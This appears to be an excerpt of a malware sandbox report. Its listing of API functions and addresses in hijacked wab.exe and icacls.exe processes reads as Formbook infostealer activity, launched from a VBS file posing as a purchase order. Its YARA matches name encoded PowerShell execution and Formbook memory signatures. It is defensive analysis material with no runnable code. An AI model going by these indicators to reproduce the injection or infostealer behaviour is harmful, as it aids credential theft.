Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162CA0 NtQueryInformationToken, 11_2_20162CA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162CC0 NtQueryVirtualMemory, 11_2_20162CC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162CF0 NtOpenProcess, 11_2_20162CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20163D10 NtOpenProcessToken, 11_2_20163D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162D10 NtMapViewOfSection, 11_2_20162D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162D00 NtSetInformationFile, 11_2_20162D00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162D30 NtUnmapViewOfSection, 11_2_20162D30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20163D70 NtOpenThread, 11_2_20163D70
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162DB0 NtEnumerateKey, 11_2_20162DB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162DD0 NtDelayExecution, 11_2_20162DD0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162E30 NtWriteVirtualMemory, 11_2_20162E30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162E80 NtReadVirtualMemory, 11_2_20162E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162EA0 NtAdjustPrivilegesToken, 11_2_20162EA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162EE0 NtQueueApcThread, 11_2_20162EE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162F30 NtCreateSection, 11_2_20162F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162F60 NtCreateProcessEx, 11_2_20162F60
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162F90 NtProtectVirtualMemory, 11_2_20162F90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162FB0 NtResumeThread, 11_2_20162FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162FA0 NtQuerySection, 11_2_20162FA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20162FE0 NtCreateFile, 11_2_20162FE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F74340 NtSetContextThread,LdrInitializeThunk, 13_2_02F74340
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F73090 NtSetValueKey,LdrInitializeThunk, 13_2_02F73090
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F74650 NtSuspendThread,LdrInitializeThunk, 13_2_02F74650
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F735C0 NtCreateMutant,LdrInitializeThunk, 13_2_02F735C0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72AF0 NtWriteFile,LdrInitializeThunk, 13_2_02F72AF0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72AD0 NtReadFile,LdrInitializeThunk, 13_2_02F72AD0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 13_2_02F72BF0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72BE0 NtQueryValueKey,LdrInitializeThunk, 13_2_02F72BE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72BA0 NtEnumerateValueKey,LdrInitializeThunk, 13_2_02F72BA0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72B60 NtClose,LdrInitializeThunk, 13_2_02F72B60
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F739B0 NtGetContextThread,LdrInitializeThunk, 13_2_02F739B0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72EE0 NtQueueApcThread,LdrInitializeThunk, 13_2_02F72EE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72E80 NtReadVirtualMemory,LdrInitializeThunk, 13_2_02F72E80
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72FE0 NtCreateFile,LdrInitializeThunk, 13_2_02F72FE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72FB0 NtResumeThread,LdrInitializeThunk, 13_2_02F72FB0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72F30 NtCreateSection,LdrInitializeThunk, 13_2_02F72F30
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72CA0 NtQueryInformationToken,LdrInitializeThunk, 13_2_02F72CA0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72C70 NtFreeVirtualMemory,LdrInitializeThunk, 13_2_02F72C70
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72C60 NtCreateKey,LdrInitializeThunk, 13_2_02F72C60
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72DF0 NtQuerySystemInformation,LdrInitializeThunk, 13_2_02F72DF0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72DD0 NtDelayExecution,LdrInitializeThunk, 13_2_02F72DD0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72D30 NtUnmapViewOfSection,LdrInitializeThunk, 13_2_02F72D30
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72D10 NtMapViewOfSection,LdrInitializeThunk, 13_2_02F72D10
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F73010 NtOpenDirectoryObject, 13_2_02F73010
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72AB0 NtWaitForSingleObject, 13_2_02F72AB0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72B80 NtQueryInformationFile, 13_2_02F72B80
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72EA0 NtAdjustPrivilegesToken, 13_2_02F72EA0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72E30 NtWriteVirtualMemory, 13_2_02F72E30
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72FA0 NtQuerySection, 13_2_02F72FA0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72F90 NtProtectVirtualMemory, 13_2_02F72F90
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72F60 NtCreateProcessEx, 13_2_02F72F60
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72CF0 NtOpenProcess, 13_2_02F72CF0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72CC0 NtQueryVirtualMemory, 13_2_02F72CC0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72C00 NtQueryInformationProcess, 13_2_02F72C00
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72DB0 NtEnumerateKey, 13_2_02F72DB0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F73D70 NtOpenThread, 13_2_02F73D70
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F73D10 NtOpenProcessToken, 13_2_02F73D10
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F72D00 NtSetInformationFile, 13_2_02F72D00
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003B7020 NtCreateFile, 13_2_003B7020
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003B7180 NtReadFile, 13_2_003B7180
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003B7270 NtDeleteFile, 13_2_003B7270
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003B7310 NtClose, 13_2_003B7310
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003B7460 NtAllocateVirtualMemory, 13_2_003B7460
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348BB596 2_2_00007FFD348BB596
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348BC342 2_2_00007FFD348BC342
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348BA54D 2_2_00007FFD348BA54D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B347D 2_2_00007FFD348B347D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B3DBD 2_2_00007FFD348B3DBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348B7AFA 2_2_00007FFD348B7AFA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_043BF258 5_2_043BF258
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_043BFB28 5_2_043BFB28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_043BEF10 5_2_043BEF10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DF0CC 11_2_201DF0CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201370C0 11_2_201370C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E70E9 11_2_201E70E9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EF0E0 11_2_201EF0E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CA118 11_2_201CA118
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20120100 11_2_20120100
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011F172 11_2_2011F172
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201FB16B 11_2_201FB16B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2016516C 11_2_2016516C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013B1B0 11_2_2013B1B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F01AA 11_2_201F01AA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E81CC 11_2_201E81CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0274 11_2_201D0274
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201352A0 11_2_201352A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B2C0 11_2_2014B2C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D12ED 11_2_201D12ED
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E132D 11_2_201E132D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EA352 11_2_201EA352
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2011D34C 11_2_2011D34C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2017739A 11_2_2017739A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013E3F0 11_2_2013E3F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F03E6 11_2_201F03E6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EF43F 11_2_201EF43F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E2446 11_2_201E2446
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20121460 11_2_20121460
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DE4F6 11_2_201DE4F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130535 11_2_20130535
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E7571 11_2_201E7571
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201F0591 11_2_201F0591
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CD5B0 11_2_201CD5B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E16CC 11_2_201E16CC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014C6E0 11_2_2014C6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20154750 11_2_20154750
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130770 11_2_20130770
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EF7B0 11_2_201EF7B0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012C7C0 11_2_2012C7C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20132840 11_2_20132840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013A840 11_2_2013A840
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201168B8 11_2_201168B8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2015E8F0 11_2_2015E8F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201338E0 11_2_201338E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20139950 11_2_20139950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014B950 11_2_2014B950
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20146962 11_2_20146962
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201329A0 11_2_201329A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201FA9A6 11_2_201FA9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EFA49 11_2_201EFA49
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E7A46 11_2_201E7A46
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A3A6C 11_2_201A3A6C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012EA80 11_2_2012EA80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201CDAAC 11_2_201CDAAC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20175AA0 11_2_20175AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201DDAC6 11_2_201DDAC6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EAB40 11_2_201EAB40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EFB76 11_2_201EFB76
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014FB80 11_2_2014FB80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E6BD7 11_2_201E6BD7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2016DBF9 11_2_2016DBF9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130C00 11_2_20130C00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A9C32 11_2_201A9C32
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201D0CB5 11_2_201D0CB5
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20120CF2 11_2_20120CF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EFCF2 11_2_201EFCF2
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013AD00 11_2_2013AD00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E1D5A 11_2_201E1D5A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20133D40 11_2_20133D40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201E7D73 11_2_201E7D73
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20148DBF 11_2_20148DBF
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2014FDC0 11_2_2014FDC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2012ADE0 11_2_2012ADE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EEE26 11_2_201EEE26
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20130E59 11_2_20130E59
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20142E90 11_2_20142E90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201ECE93 11_2_201ECE93
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20139EB0 11_2_20139EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EEEDB 11_2_201EEEDB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EFF09 11_2_201EFF09
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20150F30 11_2_20150F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201A4F40 11_2_201A4F40
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20131F92 11_2_20131F92
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_201EFFB1 11_2_201EFFB1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_20122FC8 11_2_20122FC8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_2013CFE0 11_2_2013CFE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FE12ED 13_2_02FE12ED
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F5B2C0 13_2_02F5B2C0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F452A0 13_2_02F452A0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FE0274 13_2_02FE0274
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_030003E6 13_2_030003E6
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F4E3F0 13_2_02F4E3F0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F8739A 13_2_02F8739A
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFA352 13_2_02FFA352
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F2D34C 13_2_02F2D34C
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF132D 13_2_02FF132D
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF70E9 13_2_02FF70E9
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFF0E0 13_2_02FFF0E0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FEF0CC 13_2_02FEF0CC
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F470C0 13_2_02F470C0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0300B16B 13_2_0300B16B
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_030001AA 13_2_030001AA
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF81CC 13_2_02FF81CC
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F4B1B0 13_2_02F4B1B0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F2F172 13_2_02F2F172
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F7516C 13_2_02F7516C
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FC8158 13_2_02FC8158
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FDA118 13_2_02FDA118
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F30100 13_2_02F30100
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F5C6E0 13_2_02F5C6E0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF16CC 13_2_02FF16CC
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F3C7C0 13_2_02F3C7C0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFF7B0 13_2_02FFF7B0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F40770 13_2_02F40770
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F64750 13_2_02F64750
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FEE4F6 13_2_02FEE4F6
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_03000591 13_2_03000591
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F31460 13_2_02F31460
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF2446 13_2_02FF2446
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFF43F 13_2_02FFF43F
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FDD5B0 13_2_02FDD5B0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF7571 13_2_02FF7571
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F40535 13_2_02F40535
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FEDAC6 13_2_02FEDAC6
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FDDAAC 13_2_02FDDAAC
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F85AA0 13_2_02F85AA0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F3EA80 13_2_02F3EA80
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FB3A6C 13_2_02FB3A6C
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFFA49 13_2_02FFFA49
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF7A46 13_2_02FF7A46
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FB5BF0 13_2_02FB5BF0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F7DBF9 13_2_02F7DBF9
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF6BD7 13_2_02FF6BD7
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F5FB80 13_2_02F5FB80
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFFB76 13_2_02FFFB76
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFAB40 13_2_02FFAB40
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F6E8F0 13_2_02F6E8F0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F438E0 13_2_02F438E0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F268B8 13_2_02F268B8
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0300A9A6 13_2_0300A9A6
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F42840 13_2_02F42840
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F4A840 13_2_02F4A840
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FAD800 13_2_02FAD800
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F429A0 13_2_02F429A0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F56962 13_2_02F56962
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F49950 13_2_02F49950
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F5B950 13_2_02F5B950
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFEEDB 13_2_02FFEEDB
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F49EB0 13_2_02F49EB0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F52E90 13_2_02F52E90
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFCE93 13_2_02FFCE93
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F40E59 13_2_02F40E59
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFEE26 13_2_02FFEE26
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F4CFE0 13_2_02F4CFE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F32FC8 13_2_02F32FC8
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFFFB1 13_2_02FFFFB1
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F41F92 13_2_02F41F92
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FB4F40 13_2_02FB4F40
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F60F30 13_2_02F60F30
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F82F28 13_2_02F82F28
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFFF09 13_2_02FFFF09
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F30CF2 13_2_02F30CF2
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FFFCF2 13_2_02FFFCF2
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FE0CB5 13_2_02FE0CB5
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FB9C32 13_2_02FB9C32
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F40C00 13_2_02F40C00
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F3ADE0 13_2_02F3ADE0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F5FDC0 13_2_02F5FDC0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F58DBF 13_2_02F58DBF
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF7D73 13_2_02FF7D73
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02FF1D5A 13_2_02FF1D5A
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F43D40 13_2_02F43D40
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_02F4AD00 13_2_02F4AD00
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A0CC0 13_2_003A0CC0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0039104C 13_2_0039104C
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0039C150 13_2_0039C150
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0039A1D0 13_2_0039A1D0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003B9740 13_2_003B9740
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A27D0 13_2_003A27D0
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_003A27CB 13_2_003A27CB
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0039BF30 13_2_0039BF30
Source: C:\Windows\SysWOW64\icacls.exe Code function: 13_2_0039BF27 13_2_0039BF27
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 20165130 appears 36 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 20177E54 appears 88 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2019EA12 appears 84 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 2011B970 appears 266 times
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: String function: 201AF290 appears 105 times
Source: C:\Windows\SysWOW64\icacls.exe Code function: String function: 02F87E54 appears 91 times
Source: C:\Windows\SysWOW64\icacls.exe Code function: String function: 02FAEA12 appears 86 times
Source: C:\Windows\SysWOW64\icacls.exe Code function: String function: 02FBF290 appears 105 times
Source: C:\Windows\SysWOW64\icacls.exe Code function: String function: 02F75130 appears 36 times
Source: C:\Windows\SysWOW64\icacls.exe Code function: String function: 02F2B970 appears 268 times
Source: PO 26519PZ F30 59.vbs Initial sample: Strings found which are bigger than 50
Source: amsi32_4328.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 0000000D.00000002.3363239692.0000000000A90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.3363165345.0000000000A50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
